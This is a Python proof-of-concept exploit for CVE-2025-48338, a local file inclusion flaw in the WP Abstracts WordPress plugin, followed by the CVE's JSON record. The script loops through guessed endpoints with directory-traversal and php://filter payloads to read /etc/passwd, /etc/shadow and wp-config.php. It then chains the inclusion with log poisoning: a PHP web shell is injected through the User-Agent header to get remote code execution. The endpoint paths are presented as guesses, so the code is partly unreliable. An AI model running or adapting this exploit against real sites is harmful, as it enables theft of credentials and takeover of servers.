CVE-2025-48338

# CVE-2025-48338 - WP Abstracts LFI PoC # Affected: WP Abstracts (wp-abstracts-manuscripts-manager) <= 2.7.4 # Vulnerability: PHP Local File Inclusion (CWE-98) # Researcher: [email protected] import requests TARGET_URL = "http://target-wordpress-site.com" # The vulnerable parameter typically accepts a file path for inclusion # Common vulnerable parameters in WP Abstracts: file, page, template, view def exploit_lfi(target_url, file_to_include): """ Exploit PHP Local File Inclusion in WP Abstracts plugin """ # Common vulnerable endpoints in wp-abstracts-manuscripts-manager endpoints = [ "/wp-admin/admin.php?page=wp-abstracts&action=download&file=", "/wp-content/plugins/wp-abstracts-manuscripts-manager/includes/", "/wp-admin/admin-ajax.php?action=wp_abstracts_download&file=" ] # Directory traversal payload to read sensitive files payloads = [ "../../../../../../../etc/passwd", "../../../../../../../etc/shadow", "../../../../../../../var/log/apache2/access.log", "../../../../../../wp-config.php", "php://filter/convert.base64-encode/resource=../../../wp-config.php" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } for endpoint in endpoints: for payload in payloads: url = target_url + endpoint + payload try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200 and ("root:" in response.text or "DB_PASSWORD" in response.text): print(f"[+] Vulnerability confirmed!") print(f"[+] URL: {url}") print(f"[+] Response excerpt:\n{response.text[:500]}") return response.text except Exception as e: continue return None # Log poisoning to RCE via LFI def log_poisoning_rce(target_url): """ Combine LFI with log poisoning for Remote Code Execution """ # Step 1: Inject PHP code into User-Agent header (logged in access.log) php_code = "<?php system($_GET['cmd']); ?>" headers = {"User-Agent": php_code} # Step 2: Send request to inject code into log requests.get(target_url, headers=headers) # Step 3: Use LFI to include the poisoned log file log_paths = [ "/var/log/apache2/access.log", "/var/log/httpd/access_log", "/var/log/nginx/access.log" ] for log_path in log_paths: payload = f"../../../../../../../..{log_path}" # Use the LFI to include the log and execute command rce_url = target_url + "/wp-admin/admin.php?page=wp-abstracts&action=download&file=" + payload + "&cmd=id" response = requests.get(rce_url, timeout=10) if "uid=" in response.text: print(f"[+] RCE achieved via log poisoning!") print(response.text) return True return False if __name__ == "__main__": print("[*] CVE-2025-48338 PoC - WP Abstracts LFI") exploit_lfi(TARGET_URL, "../../../../../../../etc/passwd")

{"cve": {"id": "CVE-2025-48338", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:35.023", "lastModified": "2026-04-27T20:16:07.913", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Kevon Adonis WP Abstracts wp-abstracts-manuscripts-manager allows PHP Local File Inclusion.This issue affects WP Abstracts: from n/a through <= 2.7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-abstracts-manuscripts-manager/vulnerability/wordpress-wp-abstracts-plugin-2-7-4-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}